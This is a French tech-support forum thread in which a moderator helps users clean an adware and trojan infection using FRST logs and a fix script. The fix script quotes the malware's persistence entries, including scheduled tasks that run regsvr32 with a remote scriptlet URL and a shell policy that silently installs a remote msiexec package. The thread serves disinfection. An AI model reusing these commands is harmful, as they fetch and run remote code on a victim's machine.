Rootkit ou un truc du genre

Fermé
Aze - 20 avril 2017 à 01:25
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 30 avril 2017 à 14:30
Salut,
ca fait 3 jours que je m'arrache la tête en vain. Avast me fait des alertes très souvent (d'habitude des menaces bloquées avec un lien internet, et une fois un gros message du genre il y a un rootkit: kitty.exe). J'ai utilisé avast, adwcleaner, malwarebytes, sophos, Ccleaner, tout ça plusieurs fois et en mode extrême autant que possible.
J'ai désinstallé le faux Firefox qui s'est installé tout seul, j'ai réinstallé Chrome et les effacer les répertoires contenant des faux Chromes. Quand je scanne avec les anti-virus, je trouve toujours un truc au bout d'un moment (quoique là ça fait bien 1h que j'ai pas eu d'alerte, Est-ce que c'est parce que je suis sous internet explorer pour une fois?).
Je n'ai rien télécharger dernièrement, mais j'ai branché un vieux disque dur externe de sauvegarde. Si c'est lui qui est à l'origine de mes soucis, comment accéder à mes données sans me retaper une infection?
Je sollicite votre aide, ça me ferais pleurer de devoir réinstaller ma tonne de logiciels.

Voici mes fichiers:
FRST http://pjjoint.malekal.com/files.php?id=FRST_20170420_w12h9g15s7u9
Additional http://pjjoint.malekal.com/files.php?id=20170420_x8d15b8n7p7
Shortcuts http://pjjoint.malekal.com/files.php?id=20170420_p6b14j8b12q6

Merci d'avance si qqun peut m'aider.
A voir également:

5 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
20 avril 2017 à 08:58
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :


CreateRestorePoint:
CloseProcesses:
Task: {1B4E80ED-6498-4C5E-83BC-16E1EAE30F08} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1YF8F8MkF5M8U3RWLLRkU4MjQWRkZSNWIxMYFyNkU4OF== scrobj.dll
Task: {D235E823-879C-4E2B-80F3-AB919D0169DE} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1YF8F8MkF5M8U3RWLLRkU4MjQWRkZSNWIxMYFyNkU4OF== scrobj.dll
R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Fichier non signé]
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
:\ProgramData\Microsoft\Windows\GameExplorer
2017-04-19 13:38 - 2017-04-19 13:38 - 00000000 ____D C:\Users\Sylvestre\AppData\Local\Dohat
2017-04-19 12:19 - 2017-04-19 12:19 - 00006379 _____ C:\Users\Sylvestre\Documents\free_av_17.3.2291_2017-4-19_12-19-26.avastconfig
2017-04-19 12:07 - 2017-04-19 12:07 - 00000000 ____D C:\Program Files (x86)\58F736DD_jumpeasy
2017-04-19 12:06 - 2017-04-19 20:40 - 00000000 ____D C:\Users\Sylvestre\AppData\Local\3DM
2017-04-19 12:06 - 2017-04-19 12:07 - 00000000 ____D C:\Program Files (x86)\58F736AB_jumpeasy
2017-04-18 13:32 - 2016-12-04 21:11 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-04-18 13:32 - 2016-12-04 21:11 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
HKU\S-1-5-21-4223715313-827883581-3852278338-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YF8F8MkF5M8U3RWLLRkU4MjQWRkZSNWIxMYFyNkU4OF%3D%3D /q [Pays US - 104.24.101.133]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",

A gauche, place toi sur le Bureau,

Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.


Redémarre l'ordinateur.



2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

0
Salut, merci pour l'aide, c'est vraiment cool.
Voici mon fichier fixlog:
http://pjjoint.malekal.com/files.php?id=20170420_n8x5g11w13l14

il me reste les étapes 2 et 3 à faire.
0
J'ai fait les étapes 2 et 3. Malwarebytes ne me trouve aucune menace. Par contre Adwcleaner me trouve toujours (il l'a toujours détecté) une menace dans ce fichier:
          • [ Fichiers ] *****


Fichier trouvé: C:\Users\Public\Documents\temp.dat

il fait 0 octet et semble avoir été créé à la même minute que mon scan Adwcleaner, c'est louche ce truc....
Pour l'instant je n'ai plus d'alerte Avast ou Malwarebytes, mais ça fait qu'1h que je suis sur le PC.
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660 > Aze
20 avril 2017 à 11:47
ça n'a pas d'importance ces détections.
0
Aze > Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020
20 avril 2017 à 11:51
OK merci. Tu peux mettre en résolu je pense. Merci encore!
0
jeanrembarde Messages postés 4 Date d'inscription vendredi 21 avril 2017 Statut Membre Dernière intervention 21 avril 2017
21 avril 2017 à 19:55
Bonjour, j'ai exactement le même problème que Aze, j'ai même déjà fait des scans avec Malwarebytes et tous les utilitaires les plus courants, sauf FRST car je comprends pas du tout le fonctionnement, j'ai déjà viré kitty.exe .... c'est la 3 e fois que mon Chrome et Firefox sont vérolés et sont déplacé vers des nouveaux dossier dans program files dans des noms de dossier fictifs débiles et différent à chaque fois comme Everbean ...
Bref,
Quelqu'un pourrait m'aider à analyser un rapport FRST si c'est ça qu'il faut faire ? merciii
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
21 avril 2017 à 19:58
Vu que le sujet Aze est résolu, fais passer les rapports FRST via pjjoint.
Je te donnerai le script à utiliser.
0
jeanrembarde Messages postés 4 Date d'inscription vendredi 21 avril 2017 Statut Membre Dernière intervention 21 avril 2017 > Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020
21 avril 2017 à 20:14
Merci beaucoup !
le voici :
https://pjjoint.malekal.com/files.php?id=FRST_20170421_n8t14i8d6p8
mot de passe : chien
je viens de faire un roguekiller et malwarebytes avant, donc il se peut que ça soit pas très excitant niveau virus, ... mais je continue a avoir des pop up de pub, donc ça devrait recommencer. Ah oui, et Avira ne veut plus se mettre à jour ... ou c'est mon WIFI qui passe mal, c'est possible
Merci
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660 > jeanrembarde Messages postés 4 Date d'inscription vendredi 21 avril 2017 Statut Membre Dernière intervention 21 avril 2017
21 avril 2017 à 20:38
il faut aussi le rapport Addition.txt
0
jeanrembarde Messages postés 4 Date d'inscription vendredi 21 avril 2017 Statut Membre Dernière intervention 21 avril 2017
21 avril 2017 à 20:55
https://pjjoint.malekal.com/files.php?id=20170421_u712g8h5i5
Pardon j'oubliais, pareil pour mot de passe : chien
Adwcleaner n'arrete pas de me detecter temp.dat dans mes documents ...
J'ai desinstallé chrome et réinstallé , mais bizarrement il me garde mes marques pages ... tant mieux mais je trouve ça bizarre qu'il n'aie pas tout reseté
0
Chrome garde en mémoire tes marques pages même sur un autre ordi, du moment que tu te connectes avec ton compte google ou gmail. Donc normal que tout réapparaisse. Sinon de mon côté, tout à l'air d'aller grâce à Malekal_morte, j'ai eu qd même Malwarebytes qui m'a trouvé 2 autres malwares à un moment (différents de ceux d'avant)
mais depuis c'est cool. J'essaye encore de comprendre comment j'ai pu choper ce virus, parce qu'à part le vieux disque dur que j'ai branché plusieurs jours avant, j'ai rien téléchargé du tout...
0
Ca l'air plus vicieux que ce que je pensais en fait. Hier Malwarebytes m'avait trouvé 2 malwares, aujourd'hui il me trouve plein de trojans...C'est flippant là à force.
Malwarebytes m'a fait redémarrer, Chrome ne marchait plus (réinstallé) et pas moyen d'envoyer ce post via internet explorer (le site me dit d'activer javascript alors qu'hier ça ne posait pas de souci).

Je suis désolé de devoir redemander de l'aide :=/

Voici mes logs juste après le redémarrage forcé par Malwarebytes

http://pjjoint.malekal.com/files.php?id=FRST_20170422_t514r10w6y6
http://pjjoint.malekal.com/files.php?id=20170422_w9c13w15q8n12
http://pjjoint.malekal.com/files.php?id=20170422_g12k12y6k15q7

Et ce que m'a trouvé Malwarebytes:
Hier:
Fichier: 1
Adware.Elex, C:\PROGRAMDATA\MICROSOFT\WINDOWS\GAMEEXPLORER\RESOURCES.DLL, En quarantaine, [2], [391676],1.0.1772

Aujourd'hui:
Dossier: 7
Trojan.WisdomEyes, C:\Users\Sylvestre\AppData\Roaming\SSMgre\SSRec\JTFW, En quarantaine, [531], [391958],1.0.1781
Trojan.WisdomEyes, C:\Users\Sylvestre\AppData\Roaming\SSMgre\SSRec, En quarantaine, [531], [391958],1.0.1781
Trojan.WisdomEyes, C:\USERS\SYLVESTRE\APPDATA\ROAMING\SSMgre, En quarantaine, [531], [391958],1.0.1781
Trojan.WisdomEyes, C:\Program Files (x86)\BiaoJi\CC, En quarantaine, [531], [391957],1.0.1781
Trojan.WisdomEyes, C:\Program Files (x86)\BiaoJi\FE, En quarantaine, [531], [391957],1.0.1781
Trojan.WisdomEyes, C:\Program Files (x86)\BiaoJi\FS, En quarantaine, [531], [391957],1.0.1781
Trojan.WisdomEyes, C:\PROGRAM FILES (X86)\BiaoJi, En quarantaine, [531], [391957],1.0.1781

Fichier: 1
Trojan.WisdomEyes, C:\Users\Sylvestre\AppData\Roaming\SSMgre\SSRec\JTFW\JTFW.dll, En quarantaine, [531], [391958],1.0.1781
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
22 avril 2017 à 11:15
J'aurai tendance à dire que ce sont des restes.
0
je n'y connais rien donc je te fais confiance, ça me surprend juste que Malwarebytes les découvre au fur et à mesure et pas tous en même temps.
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660 > Aze
22 avril 2017 à 11:57
Parce qu'ils ajoutent des détections.
Pour ça qu'il faudrait faire un scan lundi ou mardi.
0
De mon côté en tout cas plus de soucis. Merci encore.
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660 > Aze
30 avril 2017 à 14:30
de rien :)
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Jeanrembarde
22 avril 2017 à 08:50
Ohlala , on est perdus ! J'espère quz la correction va tenir. J'ai jamais vu un virus aussi tenace.
0